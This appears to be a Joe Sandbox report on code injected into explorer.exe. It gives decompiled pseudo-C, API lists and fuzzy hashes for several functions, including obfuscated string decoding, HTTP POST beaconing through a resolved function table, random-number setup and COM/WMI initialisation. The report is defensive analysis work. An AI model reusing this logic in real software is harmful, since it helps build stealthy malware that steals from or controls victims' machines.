        0x0008c8b2
        0x00000000
        0x0008c7f7
        0x0008c7f7
        0x0008c7f9
        0x0008c7fa
        0x0008c7ff
        0x0008c800
        0x0008c801
        0x0008c802
        0x0008c803
        0x0008c809
        0x0008c80a
        0x0008c80f
        0x0008c810
        0x0008c818
        0x00000000
        0x00000000
        0x0008c82e
        0x0008c830
        0x0008c837
        0x00000000
        0x00000000
        0x0008c848
        0x0008c84e
        0x0008c856
        0x0008c859
        0x0008c85f
        0x0008c86f
        0x0008c87b
        0x0008c880
        0x0008c886
        0x0008c896
        0x0008c8a2
        0x0008c8aa
        0x00000000
        0x0008c8aa

        APIs
        • RegisterClassExA.USER32 ref: 0008C785
        • CreateWindowExA.USER32 ref: 0008C7B0
        • DestroyWindow.USER32 ref: 0008C7BB
        • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
        • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 3082384575-2319545179
        • Opcode ID: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
        • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
        • Opcode Fuzzy Hash: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
        • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
        Download Yara Rule
        C-Code - Quality: 78%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x133f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}





















        0x00085f82
        0x00085f92
        0x00085f9c
        0x000860d0
        0x000860c3
        0x00000000
        0x000860c5
        0x000860d7
        0x00086098
        0x00000000
        0x00086098
        0x00085fa2
        0x00085faa
        0x00085fb1
        0x00085fb3
        0x00000000
        0x00085fc6
        0x00085fc6
        0x00085fcc
        0x00085fd2
        0x00085fe2
        0x00085fe7
        0x00085fef
        0x00085ff7
        0x00086013
        0x00086018
        0x0008601b
        0x0008601d
        0x0008601f
        0x0008602c
        0x00086035
        0x0008603e
        0x00086043
        0x00086044
        0x00086052
        0x0008605c
        0x0008606d
        0x00086072
        0x00086079
        0x00086080
        0x00086083
        0x0008608f
        0x00086090
        0x0008609c
        0x000860a5
        0x000860a9
        0x000860b7
        0x000860ba
        0x000860c1
        0x00000000
        0x00000000
        0x00000000
        0x000860c1
        0x00086092
        0x00086097
        0x00000000
        0x00085ff7

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
        • SetLastError.KERNEL32(000000AA), ref: 000860D7
          • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
          • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
          • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
        • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
        • GetLastError.KERNEL32 ref: 00085FEF
        • memset.MSVCRT ref: 00086013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
        • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
        • String ID: Hello qqq
        • API String ID: 1203100507-3610097158
        • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
        • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
        • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
        • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x1430938
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x1430938
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x1430938
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x1430938
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x1430938
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x1430938
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x1430938
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x1430938
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x1430938
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x1430938
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x1430938
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x1430938
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x1430938
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x1430938
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x1430938
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x1430938
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x1430938
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x1430938
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































        0x0008e671
        0x0008e683
        0x0008e68c
        0x0008e696
        0x0008e69a
        0x0008e6ab
        0x0008e6c2
        0x0008e6cf
        0x0008e6dc
        0x0008e6e9
        0x0008e6ec
        0x0008e6f1
        0x0008e6f6
        0x0008e6f8
        0x0008e700
        0x0008e70b
        0x0008e712
        0x0008e71e
        0x0008e721
        0x0008e72f
        0x0008e732
        0x0008e738
        0x0008e739
        0x0008e73b
        0x0008e744
        0x0008e745
        0x0008e74a
        0x0008e750
        0x0008e75a
        0x0008e75c
        0x0008e761
        0x0008e761
        0x0008e770
        0x0008e77f
        0x0008e783
        0x0008e792
        0x0008e795
        0x0008e79a
        0x0008e79e
        0x0008e7a5
        0x0008e7ac
        0x0008e7b4
        0x0008e7bc
        0x0008e7c3
        0x0008e7cb
        0x0008e7d3
        0x0008e7da
        0x0008e7e2
        0x0008e7ea
        0x0008e7ff
        0x0008e80c
        0x0008e80e
        0x0008e813
        0x0008e813
        0x0008e81a
        0x0008e82b
        0x0008e830
        0x0008e832
        0x0008e832
        0x0008e846
        0x0008e858
        0x0008e85a
        0x0008e85d
        0x0008e862
        0x0008e862
        0x0008e869
        0x0008e878
        0x0008e87c
        0x0008e8ba
        0x0008e8bf
        0x0008e8c7
        0x0008e8cc
        0x0008e8d7
        0x0008e8dd
        0x0008e8e7
        0x0008e8ea
        0x0008e8f3
        0x0008e8f8
        0x0008e8f8
        0x0008e901
        0x0008e94a
        0x0008e94c
        0x0008e953
        0x0008e954
        0x0008e957
        0x0008e95d
        0x0008e961
        0x0008e962
        0x0008e967
        0x0008e969
        0x0008e96f
        0x0008e984
        0x0008e98c
        0x0008e9c1
        0x0008e9c6
        0x0008e9cb
        0x00000000
        0x0008e9cd
        0x0008e98e
        0x0008e990
        0x0008e990
        0x0008e999
        0x0008e99c
        0x0008e99e
        0x0008e9a0
        0x0008e9a6
        0x0008e9a6
        0x0008e9ab
        0x0008e9ad
        0x0008e9b4
        0x0008e9b4
        0x00000000
        0x0008e9b7
        0x0008e971
        0x0008e979
        0x00000000
        0x0008e903
        0x0008e903
        0x0008e909
        0x0008e90f
        0x0008e912
        0x00000000
        0x0008e912
        0x0008e901
        0x0008e87e
        0x0008e884
        0x0008e888
        0x0008e889
        0x0008e88e
        0x0008e890
        0x0008e896
        0x0008e8b4
        0x0008e8b4
        0x00000000
        0x0008e8b4
        0x0008e898
        0x0008e8a2
        0x0008e8a4
        0x0008e8a5
        0x0008e8aa
        0x0008e8ac
        0x0008e8b2
        0x00000000
        0x00000000
        0x00000000
        0x0008e86b
        0x0008e86b
        0x0008e914
        0x0008e914
        0x0008e91a
        0x0008e91d
        0x00000000
        0x0008e91d
        0x0008e81c
        0x0008e81c
        0x0008e91f
        0x0008e91f
        0x0008e925
        0x0008e928
        0x00000000
        0x0008e928
        0x0008e81a
        0x0008e785
        0x0008e92a
        0x0008e92d
        0x0008e92f
        0x0008e932
        0x0008e935
        0x0008e93e
        0x0008e943
        0x00000000
        0x00000000
        0x0008e947
        0x00000000
        0x0008e947
        0x0008e754
        0x00000000

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
        • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
        • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
        • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 28%
        			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















        0x000916c1
        0x000916c8
        0x000916d1
        0x000916d5
        0x00091750
        0x00000000
        0x00091752
        0x000916e3
        0x000916e5
        0x000916ea
        0x00000000
        0x00000000
        0x000916f2
        0x000916f4
        0x000916f9
        0x00000000
        0x00000000
        0x00091703
        0x00091707
        0x00000000
        0x00000000
        0x00091709
        0x0009170e
        0x00091710
        0x00091711
        0x00091715
        0x0009171b
        0x00000000
        0x00000000
        0x00091726
        0x0009172f
        0x00091733
        0x00000000
        0x00000000
        0x00091735
        0x00091737
        0x0009173f
        0x00091741
        0x00091742
        0x0009174a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
        • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
        • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
        • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
        Download Yara Rule
        C-Code - Quality: 87%
        			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














        0x00092125
        0x0009212a
        0x0009212e
        0x0009212e
        0x00092133
        0x00092138
        0x00092139
        0x0009213c
        0x0009213d
        0x00092142
        0x00092145
        0x00092146
        0x0009214b
        0x00092152
        0x000921f8
        0x000921f8
        0x00000000
        0x00092161
        0x00092161
        0x00092168
        0x0009216c
        0x00092173
        0x0009217c
        0x0009217e
        0x0009217e
        0x0009217c
        0x0009218d
        0x000921b3
        0x000921bc
        0x000921be
        0x000921c4
        0x000921f3
        0x000921f3
        0x000921fb
        0x000921fe
        0x000921fe
        0x000921c6
        0x000921c7
        0x000921cd
        0x000921cf
        0x000921cf
        0x000921d4
        0x000921d3
        0x000921d3
        0x000921db
        0x000921e7
        0x000921f1
        0x000921f1
        0x00000000
        0x0009219d
        0x0009219d
        0x0009219d
        0x000921a3
        0x00000000
        0x00000000
        0x000921a5
        0x000921ab
        0x000921b0
        0x00000000
        0x000921b0
        0x0009218d

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
        • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
        • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
        • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
        • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
        • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
        • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
        Download Yara Rule
        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
        • SysAllocString.OLEAUT32(?), ref: 0008D764
        • SysAllocString.OLEAUT32(00000000), ref: 0008D778
        • SysFreeString.OLEAUT32(?), ref: 0008D7F3
        • SysFreeString.OLEAUT32(?), ref: 0008D7F6
        • SysFreeString.OLEAUT32(?), ref: 0008D7FB
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
        • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
        • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
        • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
        • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
        • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
        • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
        Download Yara Rule
        C-Code - Quality: 30%
        			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













        0x0008d530
        0x0008d533
        0x0008d536
        0x0008d547
        0x0008d54d
        0x0008d55e
        0x0008d566
        0x0008d5b7
        0x0008d5b7
        0x0008d5bc
        0x0008d5c1
        0x0008d5c1
        0x0008d5c4
        0x0008d5c9
        0x0008d5ce
        0x0008d5ce
        0x0008d5d1
        0x0008d568
        0x0008d569
        0x0008d56f
        0x0008d580
        0x0008d585
        0x00000000
        0x0008d587
        0x0008d594
        0x0008d59c
        0x00000000
        0x0008d59e
        0x0008d5a0
        0x0008d5a8
        0x00000000
        0x0008d5aa
        0x0008d5ad
        0x0008d5b3
        0x0008d5b3
        0x0008d5a8
        0x0008d59c
        0x0008d585
